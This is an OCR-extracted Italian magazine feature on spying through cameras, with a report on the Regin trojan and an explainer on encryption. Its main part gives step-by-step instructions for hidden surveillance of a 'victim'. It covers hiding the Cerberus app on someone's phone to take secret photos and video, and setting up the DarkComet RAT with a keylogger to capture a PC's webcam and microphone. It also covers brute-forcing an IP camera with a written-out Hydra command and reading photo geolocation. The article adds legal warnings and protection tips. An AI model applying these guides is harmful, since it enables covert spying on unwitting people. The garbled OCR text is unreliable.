che non ha niente di meglio da fare che farsi
gli affari nostri!

ATTENZIONE!!!
Ricordiamo che violare
le reti altrui un
reato perseguibile
penalmente dalla
le
egge italiana (art.
615-ter del codice
penale).
Le procedure da
noi descritte, pertanto, devono essere
utilizzate esclusivamente al fine di
testare la sicurezza della propria
rete locale Wi-Fi e, intervenendo
sulle impostazioni dei dispositivi,
renderla invulnerabile a qualsiasi
attacco esterno.

ECCO COME ABBIAMO SIMULATO UN ATTACCO


AI NOSTRI DISPOSITIVI
Premettiamo che tutte le tecniche descritte
in questa inchiesta sono state applicate
a dispositivi di nostra propriet connessi
ad una rete locale appositamente allestita
nei nostri laboratori. Nello speciico, abbiamo voluto mettere in pratica tutte le
tecniche (inizialmente solo teoriche) che
ci permettono di accedere da remoto ad
ogni dispositivo capace di acquisire immagini: Webcam, fotocamere integrate negli
smartphone, relex, digicam e IPCam.Tutto
questo per capire realmente a quali rischi
siamo quotidianamente sottoposti. Come
avremo modo di scoprire, nel caso delle
fotocamerepresentisusmartphoneetablet
Android ci siamo aidati ad una speciica
app e il test stato eseguito su reti com22 Win Magazine Speciali

pletamente diferenti: il telefonino stato


connesso alla rete 3G/4G, mentre il PC dal
quale abbiamo efettuato il telecontrollo
era connesso tramite un hotspotWi-Fi. Per
laWebcam e lIPCam, al contrario, abbiamo
efettuato un test nella nostra rete locale:
lIPCam, cos come il PC equipaggiato con
la Webcam, erano connessi alla stessa rete
senza fili del computer dal quale abbiamo sferrato lattacco. Ci, essenzialmente
per comodit e rapidit di esecuzione. I
risultati? Come avremo modo di scoprire
nelle pagine seguenti sono davvero sconcertanti. Per ora, preferiamo consigliare a
tutti i nostri lettori di evitare di far utilizzare
il proprio PC, smartphone e tablet ad amici,
colleghi o, peggio ancora, estranei: ad un

malintenzionato
o bastano pochi secondi
per spiarci per tutto il resto della vita! Per le
IPCam, poi, megliio impostare password
di accesso molto rrob
buste, decisamente
lunghe e nelle quaali sono presenti
combinazioni di letttere, numeri e
caratteri speciali. E se anche tu
sei curioso di testaaree le tecniche
descritteinquestincchiesta,sei
libero di farlo. M
Ma solo su
dispositivi di tua pro
p opriehiam
mo,
t. Non dimentich
infatti, che violarre la
privacy altrui un
u
reato perseguito
penalmente dalla
legge italiana!

| Cos ti spio dallo smartphone | Fai da te |

Cos fa lhacker
REFLEX/DIGICAM
Dietro ad ogni immagine digitale si nascondono
dati segreti che possono rivelarci lesatta posizione
da cui partito il clic. Ecco come scoprirlo

SMART TV
Sembrer incredibile, ma anche
i sistemi di riconoscimento
vocale e le webcam integrate
nei televisori possono
trasformarsi in spioncini sulla
nostra vita privata

SMARTPHONE
Un semplice antifurto per
smartphone come Cerberus
pu consentire ad un
malintenzionato di spiarci
attraverso la fotocamera del
dispositivo

IPCAM
Vengono usate per sorvegliare
casa, ma non sempre sono
sicure. Ecco come un estraneo
potrebbe violare la nostra
privacy

M
WEBCAM
software giusti c chi
Con i soft
riesce a controllare da remoto la
videocamera del PC e ascoltare
tutto ci che passa dal microfono

LA TV CI SPIA DALLA WEBCAM E ASCOLTA QUEL CHE DICIAMO


Permettono di collegarsi a Internet per navigare
rimanendo comodamente seduti sul divano
di casa e, come uno smartphone o un tablet,
ofrono la possibilit di installare decine di app
per aggiungere nuove funzioni o trasformarle
in divertenti console di gioco: stiamo parlando,
ovviamente, delle Smart TV, sempre pi difuse
nei salotti degli italiani. Proprio alcune di queste
funzioni, per, possono rappresentare un serio
pericolo per la nostra privacy. storia di questi
giorni la notizia secondo la quale i sistemi di
riconoscimento vocale e le Webcam integrate
nelle Smart TV Samsung hanno il brutto vizio di
trasmettere in chiaro verso server remoto tutti i
suoni e le immagini che riprendono nellambien-

te circostante. Samsung ovviamente subito


corsa ai ripari, promettendo un aggiornamento
del sistema operativo installato nei suoi televisori che permette di criptare tutti questi dati. Per

saperne di pi, scarica da Win Extra linchiesta


che abbiamo dedicato proprio a questa problematica. Vi terremo aggiornati sullevolversi
della faccenda nei prossimi numeri.

IL KIT DEL PERFETTO SPIONE INFORMATICO


APP PER CONTROLLO REMOTO

CERBERUS ANTIFURTO
Nascce come antifurto,
ma nelle mani di un
m
malintenzionato
diventa un
potente strumento
per controllare
da remoto lo
sma
smartphone,
registrare le nostre
conversazioni, attivare la fotocamera e
sbirciare nella rubrica telefonica!

TOOL DI ACCESSO REMOTO

DARKCOMET RAT
LEGACY
PPermette di
attivare da
remoto, e senza il
nostro consenso,
la Webcam
installata nel
computer. Una volta
preso il controllo, pu accenderla in
ogni momento per registrare tutto ci
che accade in casa nostra.

DISTRIBUZIONE LINUX

EDITOR DATI EXIF

KALI LINUX 1.1.0

JEFFREYS
JEFFREY
S EXIF VIEWER

un sistema operativo
pronto alluso con
preinstallate
tutte le principali
applicazioni
preferite dai
pirati. Tra queste
c Hydra, un tool
specializzato che permette di portare a
termine un attacco di tipo brute force
basato su dizionario di password.

un servizio on-line
che permette di
aanalizzate i dati
EEXIF associati a
tutte le immagini
scattare con una
fotocamera digitale.
In pochi
poc secondi
in grado di rivelarci anche lesatta
posizione geograica in cui la foto
stata scattata!

Speciali Win Magazine 23

Cos fa lhacker

| Fai da te | Ti spio dallo smartphone |

Cos ti sbircio
dal tuo telefonino!
Usando lapp Cerberus per Android possiamo PROTEGGITI COS
Non c niente di pi personale di uno
origliare le conversazioni delle nostre vittime
smartphone ed quindi importante
proteggerlo al meglio per evitare che
e scoprire il luogo in cui si trovano
qualcuno possa intrufolarsi nella no-

n telefonino o un tablet lasciato incustodito per qualche minuto una


manna dal cielo per chi vuole spiarci.
Non tanto perch cos ha la possibilit di
sbirciare nella nostra rubrica telefonica,
fra gli SMS e le conversazioni WhatsApp,
ma perch pu installare unapplicazione
che gli consente di farlo tutte le volte che
vuole, ovunque lui sia. E tramite la stessa
applicazione potr anche ascoltare ci
che stiamo dicendo al telefono, attivare
la fotocamera frontale o posteriore e scat-

tarci una foto o registrare direttamente un


filmato. Il tutto, senza che noi possiamo
accorgercene. Lapplicazione in questione
si chiama Cerberus che nasce con scopi
ben pi nobili ma, come al solito, i pirati
hanno trovato un metodo per farne usi
illegali. E se pensiamo che controllare
lelenco delle applicazioni installate possa
metterci al riparo ci sbagliamo di grosso:
dopo essere stata installata, Cerberus
come un fantasma nascosto nel nostro
smartphone!

stra vita privata. Ecco le dritte giuste


per mettere al sicuro i vari dispositivi:
Non lasciare mai incustodito il proprio smartphone, soprattutto nei locali pubblici.
Impostare sempre una procedura di blocco della
schermata di Home.
Non installare mai app sconosciute o veriicate,
anche se scaricate dagli store uiciali.
Controllare periodicamente lelenco delle app
installate per individuare quelle sospette.
Installare un buon antivirus in grado di monitorare
anche le app in esecuzione.

Installiamo la spia nel cellulare


Sul telefono della nostra vittima designata dobbiamo conigurare unapp spiona che ci permette di controllare
il dispositivo da remoto. Vestiamo quindi i panni di un malintenzionato e impicciamoci dei fatti altrui.

Il into antifurto

Veriichiamo che lo smartphone o il tablet


Android da controllare sia connesso a Internet (tramite la rete 3G/4G o un hotspot Wi-Fi): accediamo al Play Store, cerchiamo lapp Cerberus antifurto e installiamola. Al primo avvio tappiamo sul pulsante Crea un account Cerberus.

24 Win Magazine Speciali

Username e password

Scegliamo un nome utente, una password e


forniamo un indirizzo e-mail valido: useremo
poi questi dati per controllare il dispositivo anche da
remoto. Confermiamo con Crea account. Accettiamo
le condizioni duso e tappiamo nuovamente su Crea
account per completare la procedura.

C ma non si vede!

Dallinterfaccia principale dellapp tappiamo


sulle tre lineette orizzontali poste in alto a
sinistra per accedere al Main menu. Dal menu Conigurazione principale tappiamo Password e attiviamo lopzione Nascondi dalla lista applicazioni per
nascondere lapp fra quelle installate!

Cos fa lhacker

| Ti spio dallo smartphone | Fai da te |

Siamo pronti per spiare


Ora che abbiamo installato Cerberus sul telefonino o sul tablet Android della nostra vittima,
possiamo divertirci a controllarla da remoto senza che se ne accorga! Ecco come procedere.

Si controlla dal Web

Grazie alla comoda interfaccia Web, il device pu essere controllato da qualsiasi PC connesso ad Internet. Raggiungiamo
la pagina Web www.cerberusapp.com e compiliamo i campi Username e Password con i dati scelti al Passo A3. Confermiamo con
un clic sul pulsante Log in.

Scattiamo una foto

Appare cos linterfaccia di controllo remoto di Cerberus. Dal


menu a tendina Dispositivo possibile selezionare il tablet
o lo smartphone da controllare (nel caso ce ne sia conigurato pi
di uno). Spostiamoci in Comando e da qui selezioniamo lopzione
Scatta foto.

BUONI
CONSIGLI
5 EURO E LA USI
PER SEMPRE!
Come abbiamo scoperto, Cerberus scaricabile dal Play Store di Android senza spendere un
solo centesimo. Ci non
vuol dire, per, che lutilizzo dellapp sia gratuito per sempre. Gi,
perch gli sviluppatori
di Cerberus consentono
agli utenti di provare
liberamente lapp per 7
giorni, trascorsi i quali
necessario procedere
allacquisto di una licenza duso. Quanto cosa?
Per fortuna, solo pochi
spiccioli: con 4,99 euro
possibile utilizzare a
vita Cerberus e installarla su 3 diferenti dispositivi. Il pagamento
avviene direttamente
allinterno dellapp tramite PayPal.

I CLIENT PER
ANDROID E
IPHONE

Fotocamera frontale o posteriore?

Proprio sotto la voce Comando appaiono delle nuove opzioni: selezioniamo la voce Scatta foto immediatamente.
Come impostazione predeinita, verr usata la fotocamera frontale:
se vogliamo usare quella principale, spuntiamo Usa camera posteriore. Confermiamo con Invia comando.

Immagini via e-mail

Afinch tutto vada per il verso giusto necessario che il


dispositivo controllato sia connesso al Web. Accediamo alla
casella di posta indicata al Passo A3 e veriichiamo larrivo di un nuovo messaggio: in allegato troveremo la foto catturata di nascosto con
la nostra vittima (nel nostro caso un collega intento nel suo lavoro)!

E se voglio un video?

Se vogliamo registrare un video, selezioniamo Cattura video


(da Comando) dallinterfaccia Web di Cerberus. Anche in
questo caso possiamo scegliere se usare la fotocamera frontale o
posteriore. Impostiamo la durata del video (massimo 30 secondi) e
confermiamo con Invia comando.

Il telefonino o il tablet
Android spiato pu essere controllato non solo tramite linterfaccia
Web (e quindi da qualsiasi PC connesso al Web
presente sulla faccia
della Terra) ma anche
da un altro smartphone
Android o iPhone. Gli
sviluppatori di Cerberus
hanno infatti rilasciato
dei client uiciali e gratuiti (disponibili su Play
Store e App Store) che ci
permettono di gestire
il controllo remoto pi
comodamente anche
quando non siamo davanti al PC.

Non hai pi segreti!

Al termine della registrazione, il video verr inviato in allegato ad un messaggio di posta elettronica (proprio come nel
caso della foto). Il formato di registrazione .3gp e la qualit dipende, per ovvie ragioni, dalla fotocamera installata nello smartphone o
tablet spiato.
Speciali Win Magazine 25

Cos fa lhacker

| Fai da te | Ti spio dalla Webcam |

La Webcam del PC
ti spia da remoto
Con i software giusti possiamo controllare PROTEGGITI COS!
Con alcuni semplici accorgimenti
la videocamera dei PC altrui e ascoltare
possiamo evitare che qualche malintenzionato sfrutti la Webcam del
tutto ci che viene captato dal microfono
computer per intrufolarsi nella nostra

rmai tutti i notebook in circolazione


sono equipaggiati con una Webcam
integrata che ci permette di avviare
una videochiamata e sentirci cos pi vicini ad amici, parenti e colleghi dufficio.
Ma anche pi spiati da pirati e malintenzionati! Gi, perch anche se sembra assurdo, c chi riesce ad attivare, da remoto
e senza il nostro consenso, la Webcam
installata nel nostro computer. E la facilit con la quale possibile raggiungere
lobiettivo lascia chiunque senza parole,

a tal punto che i pi paurosi potrebbero


aver gi deciso di coprire lobiettivo della
Webcam stessa con un pezzo di nastro
isolante nero! Una soluzione sicuramente
efficace e semplice da mettere in pratica,
ma forse un po esagerata, come scopriremo pi avanti: esistono infatti dei metodi
meno rudimentali che ci consentono di
dormire sonni tranquilli nella certezza
che nessuno ci stia spiando. Ma per i pi
scettici, abbiamo deciso di passare dalla
teoria alla pratica.

vita privata:
Se la Webcam USB, scolleghiamola quando
non serve.
Teniamo sempre sotto controllo il LED di funzionamento e veriichiamo che non sia acceso.
Verifichiamo che tra i processi in esecuzione
nel sistema non ci siano quelli che gestiscono
la Webcam.
Se proprio non abbiamo modo di disattivare la
Webcam, usiamo del nastro adesivo nero per
coprire lobiettivo.
Eseguiamo i punti precedenti anche per disabilitare il microfono collegato al PC.

Procuriamoci tutto loccorrente per


La squadra attrezzata per sbirciare dalle Webcam altrui ha gi tutti i software utili per prenderne il controllo: deve
solo trovare il modo di installarli sul PC della vittima e conigurare i DNS per renderlo sempre raggiungibile.

Un nuovo dominio

Per far s che il PC dello spione (quindi quello


installato nel nostro laboratorio) sia raggiungibile anche da remoto necessario usare un servizio
di DNS dinamico. Da www.no-ip.com clicchiamo Sign
Up e completiamo la registrazione guidata. Annotiamo il nome scelto (ad esempio, dominio.no-ip.org).

26 Win Magazine Speciali

Il iusto software

il momento di agire sul computer da spiare. Dal DVD allegato alla rivista preleviamo il software Simple Port Forwarding e avviamone
linstallazione. Clicchiamo sul pulsante Next ino al
termine della procedura. Non ci resta che premere su Finish.

Una porta sempre aperta

Avviamo Simple Port Forwarding. Spostiamoci nel menu File e da qui clicchiamo sul
pulsante Aggiungi porte. Nella nuova schermata che
appare, scegliamo Aggiungi personale: digitiamo
un Nome identiicativo e compiliamo il campo Porta
Finale con 1604. Confermiamo con Aggiungi.

Cos fa lhacker

| Ti spio dalla Webcam | Fai da te |

Locchio digitale entra in funzione


Per spiare la vittima abbiamo installato sul nostro PC il server DarkComet RAT Legacy (diverso dalla versione
Module): bastano quindi pochi clic per attivare da remoto la Webcam e il microfono collegati al suo PC!

Ti spio quando vo lio

Avviamo DarkComet RAT Legacy e connettiamoci al PC spiato cliccando DarkComet-RAT


(in alto a sinistra). Scegliamo Listen to new port e
clicchiamo Listen per connetterci. In Spy Functions e
attiviamo la Webcam da remoto! Dal menu che appare
facciamo doppio clic su Webcam Capture.

Ecco le imma ini!

Ci ritroveremo cos nella schermata di impostazione della Webcam. Selezionata la periferica, clicchiamo Start Capture. Immediatamente Dark
Comet RAT Module inizier a trasmettere le immagini catturate dalla Webcam della vittima al DarkComet
Legacy installato sul PC del nostro laboratorio!

C anche laudio

Il software spia in grado di mostrarci non


solo le immagini riprese di nascosto dalla
Webcam, ma anche i suoni presenti nellarea circostante al computer spiato. Per fare ci, effettuiamo un
doppio clic su Sound Capture (lasciando invariate le
impostazioni mostrate) e confermiamo con Capture.

spiare dalla Webcam del notebook

La spia nel PC

Superata questa fase, passiamo allinstallazione di DarkComet RAT Module, il software che ci permetter di spiare dalla Webcam del PC anche
da remoto. Preleviamolo dalla sezione Antivirus&Sicurezza del Win DVD-Rom e
installiamolo: clicchiamo Next e terminiamo con Finish.

Conigurazione lampo!

Avviamo DarkComet RAT Module e nel campo IP/DNS inseriamo il dominio registrato al Passo A1. Compiliamo Port con 1604 e spuntiamo Active ofline keylogger during this session. Premiamo Settings, attiviamo le opzioni
presenti e terminiamo prima con Fine e poi con Active.

Speciali Win Magazine 27

Cos fa lhacker

| Software | Ti spio dalla IPCam |

Le IPCam ven ono usate per sorve liare la casa ma non sempre sono
sicure. Ecco come un estraneo potrebbe violare la nostra privacy

Ti sorveglio
o ti spio?
L

e IPCam sono delle speciali telecamere


capaci di condividere le immagini riprese e avvisarci se qualcuno attraversa
larea videosorvegliata: basta posizionarle
nella zona da riprendere, connetterle alla
rete Wi-Fi e sono gi operative. Da qualsiasi
PC connesso in locale (o da remoto, previa

ddiamoci
a
a Linux!

configurazione di un DNS dinamico: scopri


come a pagina 26), basta avviare il browser,
connettersi alla rete e raggiungere lindirizzo
dellIPCam per vedere le immagini riprese.
Ci lascerebbe pensare che nessuno, oltre a
noi, sia in grado di spiare dalla nostra IPCam.
Ma non cos

PROTEGGITI COS

Basta seguire poche e semplici regole


per mettere al riparo da ogni tipo di
attacco informatico il nostro sistema
di videosorveglianza:
Modiichiamo sempre la password predeinita di
accesso al router.
Per proteggere laccesso allIPCam usiamo password robuste composte da almeno 8 caratteri
misti alfanumerici e simbolici. Renderemo cos
pi complesso da portare a termine un attacco
di tipo brute force basato su dizionario password.
bene conigurare un irewall per impedire accessi
indesiderati dallesterno alla nostra rete locale.
Coniguriamo regole di accesso alla LAN iltrando
dal router anche il MAC Address della IPCam.

asterizziamo
as
te
la distro

aamo il PC da DVD

Dal DVD allegato alla rivista scarichiamo


larchivio compresso KaliLinux.zip. Scompattiamolo e salviamo in una qualsiasi cartella dellhard disk limmagine in formato ISO della
distribuzione Kali Linux, disponibile sia a 32 bit sia
a 64 bit.

Raggiungiamo quindi il percorso nel quale


abbiamo salvato la ISO, selezioniamola con
un clic del tasto destro del mouse e spostiamoci su Apri con. Selezioniamo Masterizzatore
immagini disco di Windows, inseriamo un DVD
vergine nel masterizzatore e avviamo la scrittura.

Riavviamo il PC e accediamo al BIOS (premendo Canc allavvio): settiamo il boot da


DVD (la procedura varia in base al modello
di scheda madre). Con il disco di Kali Linux inserito
nel lettore, attendiamo che appaia linterfaccia di
boot. Selezioniamo Live (686-pae) e diamo Invio.

In lo
locale o da remoto?

Basta un comando
Bast

LLIPCam
IPC stata bucata!

Appare cos il desktop di Kali Linux. Abbiamo supposto che il PC attaccante si fosse
gi intrufolato nella LAN della IPCam o che
si fosse a conoscenza dellIP del dispositivo. Abbiamo quindi avviato il browser e raggiunto linterfaccia
graica del router per scoprire lIP della telecamera.

Possiamo ora sferrare lattacco brute force:


avviamo il terminale (Ctrl+Alt+T) e diamo il
comando hydra -l admin -P /root/Desktop/
dizionario.txt -e ns -f -V 192.168.0.128 http-get
/. Il ile Dizionario.txt lelenco delle potenziali password; 192.168.0.128 lindirizzo della IPCam.

Kali Linux si mette alla ricerca della password.


Scovata la chiave daccesso, verr mostrata direttamente nel terminale evidenziata in
verde. Non ci resta che ritornare al browser, raggiungere lindirizzo dellIPCam e digitare la chiave
daccesso per vedere le immagini live!

28 Win Magazine Speciali

| Ti spio dalla fotocamera | Software |

Cos fa lhacker

Ecco cosa abbiamo scoperto analizzando le imma ini di itali


catturate con le nuove relex e di icam dotate di modulo GPS

I tuoi segreti
in una foto
M

olte delle fotocamere reflex e compatte di nuova generazione integrano un modulo GPS che consente di
geolocalizzare gli scatti. Ma dove vengono
salvati i dati relativi alla nostra posizione?
Negli EXIF, ovvero quei metadati che viaggiano in accoppiata con la foto. Sembrano
nascosti, ma basta usare specifici tool per
visualizzarli. Al loro interno, oltre alle co-

tool
too
o che spia li scatti di itali
Da un PC connesso a Internet colleghiamoci a www.winmagazine.it/link/3030: da qui
che possiamo analizzare i dati EXIF di uno
scatto scaricato dal Web o presente nel PC. Clicchiamo Scegli ile e raggiungiamo il percorso nel quale
presente lo scatto. Confermiamo con Apri.

ordinate geografiche dello scatto, possiamo


visualizzarne anche la data e lora. Se siamo
in possesso di una fotocamera con GPS integrato, stiamo dunque bene attenti a ci che
condividiamo sul Web: ad un malintenzionato basta infatti scaricare la foto condivisa
e analizzarne gli EXIF per scoprire in pochi
secondi dove labbiamo realizzata (e dunque,
dove siamo stati)!

a faccia
a
della privac
Aspettiamo una manciata di secondi (necessari per il caricamento del ile) prima di veder
apparire tutti i dati che si nascondono dietro
la foto. Oltre ai dati tecnici di scatto, se la foto
geolocalizzata nella sezione Location appaiono le
relative coordinate geograiche.

PROTEGGITI COS

Usando alcune accortezze possiamo


condividere le nostre foto su Internet
senza timore di rilevare alcuna informazione personale:
Quando scattiamo una foto che pensiamo di
condividere ad esempio sui social network, ricordiamoci di disattivare il modulo GPS della
fotocamera e la memorizzazione dei dati di
geolocalizzazione.
Prima di pubblicare limmagine, cancelliamo i dati
EXIF contenenti informazioni sensibili.
Condividendo una fotograia su Internet disabilitiamo la funzione di download, sempre che il
servizio on-line lo consenta.
Possiamo anche pubblicare i dati EXIF delle foto, ma almeno evitiamo di farlo per quelle pi
personali.

t ovo
o sulla mappa!
In Location guessed from coordinates viene mostrato il punto esatto (o leggermente
approssimativo, molto dipende dalla qualit
del modulo GPS utilizzato) dal quale partito lo scatto. Clicchiamo sul link Google per vedere sulla cartograia di Maps lindirizzo segnalato.

FOTOCAMERE CON WI-FI INTEGRATO NEL MIRINO DEI PIRATI


Le fotocamere digitali relex, mirrorless e compatte si fanno sempre pi accessoriate.
E oltre ad efetti integrati, GPS e chi pi ne ha pi ne metta, i modelli pi evoluti integrano anche la connettivit Wi-Fi. Per altre ancora, invece, sono disponibili accessori
che consentono la comunicazione wireless con speciiche applicazioni mobile o
PC. Lutilit? Riuscire a trasferire pi comodamente foto e ilmati. Peccato, per, che
dove c una rete senza ili, quasi sempre c anche un pirata pronto a lanciare il suo
amo in attesa che qualche pesce abbocchi. C chi, infatti, riuscito a bypassare
la sicurezza delle reti Wi-Fi ad hoc che le fotocamere con Wi-Fi integrato creano.
Interponendosi fra fotocamera e dispositivo ricevente (uno smartphone, un tablet
o un PC) per alcuni stato possibile snifare tutti i dati in transito. In parole povere, i
pirati riescono a rubare le foto in trasferimento! Per fare ci bastano programmi del
calibro di Cain & Abel, software speciici per attacchi di tipo Man in the middle (nel
quale, appunto, lattaccante si interpone fra due dispositivi che comunicano fra loro).
Speciali Win Magazine 29

| Regin |

Arriva il virus
che spia tutti
Centro sicurezza
Win Magazine

EDD
DY WILLEMS
Esperto sicurezza
di G Data

Regin mira ad impadronirsi


del controllo remoto e della
supervisione dei dati in tutti
i settori

no spettacolare caso di spionaggio


cibernetico sta creando molto scompiglio in Rete: stiamo parlando del programma Regin, un supertrojan che riesce a
camuffarsi a regola darte e ad attuare alcuni
odiosi stratagemmi. Regin si distingue infatti
da tutte le altre minacce virali per il fatto di
essere molto difficile da identificare e di
permettere di compiere attacchi informatici
evoluti a danno di governi, aziende e privati.

I punti di forza di Regin


Questa nuova superarma dei servizi segreti
pericolosa per tre motivi. Anzitutto si basa
su un sistema modulare: questo significa
che gli ideatori possono confezionarsi
il virus ad hoc ed effettuare operazioni di
spionaggio sui computer delle vittime per
carpire password, scattare foto delle videate
del computer, tenere sotto controllo il flusso
dei dati, ripristinare materiale cancellato
ecc. In secondo luogo i criminali indirizzano
i malcapitati verso pagine Internet infette
dove verr iniettato il codice fraudolento.
Se ad esempio la vittima avvia una richiesta di
30 Win Magazine Speciali

Su Internet sta infuriando una guerra


cibernetica. Il pericolo si chiama Regin,
un supertrojan che da anni spia governi
e industrie. Vediamo di cosa si tratta
ricerca, questa viene intercettata e provvede
a richiamare una versione contraffatta del
motore di ricerca contenente il virus, senza
che le vittime si accorgano minimamente
dellinfezione in atto. La terza caratteristica
di Regin che il trojan agisce per lungo tempo in estrema segretezza dal momento che
la sua struttura modulare ne rende molto
complesso lo smascheramento. Il virus infatti,
oltre a cancellare le proprie tracce in modo
permanente, costituito da un codice per la
maggior parte criptato che ne rende difficile
lindividuazione. Il trojan inoltre, completo
di tutti i suoi moduli, richiede uno spazio di
appena 20 Megabyte. I criminali, infine, riescono a gestire il fastidioso spione attraverso
una connessione Internet criptata cos da
lavorare senza dare nellocchio.

Una virulenza senza pari


I moduli su misura di Regin consentono
di sferrare attacchi spyware particolarmente
distruttivi. Gli esperti della sicurezza hanno
scoperto, ad esempio, unespansione del
trojan su un computer dellazienda di telecomunicazioni belga Belgacom che teneva sotto controllo le centraline di telefonia
mobile. I pirati erano riusciti a intercettare
informazioni telefoniche e dati dalle cellule
delle connessioni mobile, a selezionarli e
a inoltrarli altrove. Regin potrebbe essere
addirittura in grado di spiare computer privi
di collegamento Internet. Per attuare ci il
trojan provvede anzitutto a memorizzare i dati
sottratti sullhard disk del PC infetto. Baster
collegarsi con un altro computer, ad esempio
quellamministratore di rete, affinch il virus
provveda a copiare fulmineamente tutti i dati.
Collegandosi con questultimo computer via

Internet, le informazioni trafugate entreranno


in possesso dei malfattori.

Vittime e autori del trojan


Fino ad oggi sono state scoperte alcune centinaia di attacchi informatici. Marco Preuss
di Kaspersky riuscito a rintracciare bersagli
rilevanti in Russia e in Medio Oriente (vedi
grafico, nella pagina seguente), ma Regin sta
purtroppo perpetrando i suoi reati anche in
paesi europei. Il quotidiano austriaco Standard ha riferito che anche lInternational
Atomic Energy Agency a Vienna (IAEA), che
partecipa ai colloqui tra Iran e i paesi occidentali, fa parte delle vittime. Quasi la met delle
infezioni accertate di Regin pu avere colpito
privati o piccole aziende. Marco Preuss ritiene
che anche la Germania rientri tra gli obiettivi.
certo che dietro Regin non si nascondono
criminali da strapazzo o hacker genialoidi,
che hanno programmato il virus in piena autonomia. Lo sviluppo di questo trojan deve
avere richiesto enormi risorse finanziarie e
un lavoro di anni. La complessit del virus e
la modalit di funzionamento di Regin porta
la maggior parte degli esperti a concludere
che l sotto si nasconda un potente servizio
segreto. La frequenza degli attacchi riscontrata
in Medio Oriente potrebbe fare pensare ad un
organismo occidentale. Sospettati principali
sono lNSA americano e il GCHQ britannico.
Se ci chiediamo se Regin potr difenderci dal
terrorismo, la risposta no, perch concepito
per un controllo permanente sul lungo periodo. Gli obiettivi sono principalmente industrie
e scienziati di paesi europei e asiatici. Si pu
infatti affermare che il supertrojan indaga su
segreti industriali (Kutsal Berk di F-Secure
certo che si tratta soprattutto di spionaggio).

Centro sicurezza

| Regin |

IL TROJAN CHE INFETTA I COMPUTER DI TUTTO IL MONDO


Gli esperti della sicurezza Kaspersky hanno scoperto attacchi informatici da parte di Regin soprattutto in Medio Oriente,
Russia e Asia. Si insinua il sospetto che dietro vi siano i servizi segreti di paesi occidentali. Ecco la mappa della sua diffusione.

Russia

Germania
Belgio
Siria

Afghanistan

Algeria
Iran

India

Pakistan
Indonesia

Kiribati
Brasile
Malaysia

Le soluzioni software per


bloccare il malware
A questo punto viene da chiedersi se possibile stanare il trojan su un computer. Diciamo

subito che le suite antivirus classiche di Kaspersky,


Symantec e G Data Internet Securik S
ty sono in grado di riconoscere, in Trojan.
Win32.Regin.gen o Rootkit.Win32.Regin,

Fiji

almeno alcuni segmenti di Regin. Sar bene per non senttirsi troppo sicuri, dato che
possono senzalttro esistere altre funzioni e
varianti di questo
o malware.

Scoviamo la talpa di stato nel PC


Per veriicare se nel nostro computer sono presenti programmi di spionaggio possiamo ricorrere a Detect, una
suite di protezione consigliata anche da organismi come Amnesty International. Ecco come usarlo.

Disconnettiamo il PC
da Internet

Prima di avviare Detekt disattiviamo tutti i collegamenti Internet. Baster staccare il cavo Ethernet
o rendere inattive tutte le connessioni WLAN. Per evitare errati avvisi di segnalazione, disattiviamo temporaneamente anche il nostro antivirus.

Me lio se in italiano

Installiamo Detekt (lo trovi nel DVD allegato


all rivista. Il tool non funziona con Windows
8.1 a 64 Bit). Quando compare linterfaccia clicchiamo col tasto destro su Collegamento, selezioniamo Esegui come amministratore e poi Si. Scegliamo Italian.

Ese uiamo la scansione

Cliccando su Scan Detekt esplorer il PC


alla ricerca di trojan di stato. Nel caso in cui
segnali Pericolo, vuol dire che stato scoperto qualcosa di sospetto: sospendiamo luso del PC, inch
il virus non sar stato rimosso (magari richiedendo
lintervento di un esperto).

Speciali Win Magazine 31

Cos fa lhacker

| Da sapere in 60 secondi | Criptazione |

Quello che devi sapere sui


metodi di CRIPTAZIONE
Chiunque desideri rendere inaccessibili ai servizi segreti e afini le proprie
e-mail o le fotograie dovr criptarle tramite uno dei tanti metodi disponibili
LA CRIPTAZIONE
NEI SECOLI
ANTICHIT: 2.500 anni fa i Greci avvolgevano attorno ad un
bastone di legno i messaggi segreti, scritti su una pergamena
(Skytale/ Scitala, vedi illustrazione a sinistra). Solo chi era in possesso
di un bastone di ugual diametro era in grado di interpretare il testo.
ANTICA ROMA: Giulio Cesare era solito scambiare le lettere dei propri testi
con il terzo carattere successivo dellalfabeto. Ad esempio, dalla parola CAESAR
sarebbero risultate le seguenti lettere in successione: FDHVDU. Questo metodo
era per abbastanza semplice da decifrare.
MEDIOEVO:NelperiododelRinascimentoilmatematicoLeonAlbertiinvent
un disco per le criptazioni che funzionava tramite anelli scorrevoli sui quali
erano riportate delle lettere.
SECONDA GUERRA MONDIALE: Tramitte la
macchina per crittograia Enigma (vedi fo
oto),
le forze armate tedesche cifravano i loro
messaggi radio. Solo dopo aver trafugato
unadiquestemacchineEnigmanel1941gli
Alleati riuscirono a capire il funzionamento
del sistema a rulli che questo congegno
nascondeva.

LE DOMANDE RICORRENTI

COSA POSSO CRIPTARE? Oltre alle e-mail, tutto il materiale


digitale presente sul PC: documenti, foto, video e aini, singole
partizionielharddiskcompleto(peresempio,utilizzandoTrueCrypt).
Le password e i dati di accesso per gli shop on-line e aini possono
essere protetti ricorrendo a software appositi.

COSA NON POSSO CRIPTARE? I cittadini comuni non


hanno la possibilit di criptare le conversazioni telefoniche
che transitano su rete fissa o via Internet, per renderle non
intercettabili. La criptazione possibile solo attraverso cellulari
speciali (del costo di circa 2.500 Euro), ma affinch il sistema
funzioni ne devono essere in possesso tutti gli interlocutori.

QUANTO SICURA LA CRIPTAZIONE AES-256? Molti


programmi si aidano allo Advanced Encryption Standard, che
provvedeasuddividereidatiinnumerosipiccoliblocchieamischiarli.
Con la chiave di maggior lunghezza (256 bit) il metodo si rivela
inattaccabile, poich anche i supercomputer necessiterebbero di un
tempo ininitamente lungo per la decriptazione (vedi graico sotto).

QUANTO SICURA LA CRITTOGRAFIA AES


QUANTO TEMPO IMPIEGA
UN SUPERCOMPUTER* PER
DECODIFICARE LE DIVERSE VARIANTI
DEI METODI DI CRIPTAZIONE

AES

infinitamente lungo

56 BIT

13,75 miliardi di anni

128 BIT

399 secondi

256 BIT

*Supercomputer da ca. 10 Petaflop

COME FUNZIONA
LA CRIPTAZIONE?
Gli attuali metodi di criptazione si basano su complicate formule matematiche. Vengono
utilizzati due sistemi:
Simmetrico: Si utilizza la stessa chiave sia per la criptazione che per la decriptazione, che
deve essere conosciuta da coloro che vogliono accedere ai dati cifrati. naturalmente
importantissimo mantenerla segreta. Questo metodo adatto per elevati quantitativi di dati.

1
2

Asimmetrico: Questo metodo popolare soprattutto per la criptazione di e-mail. Il principio


di base il seguente: il mittente, per cifrare il messaggio, sfrutta la chiave pubblica del
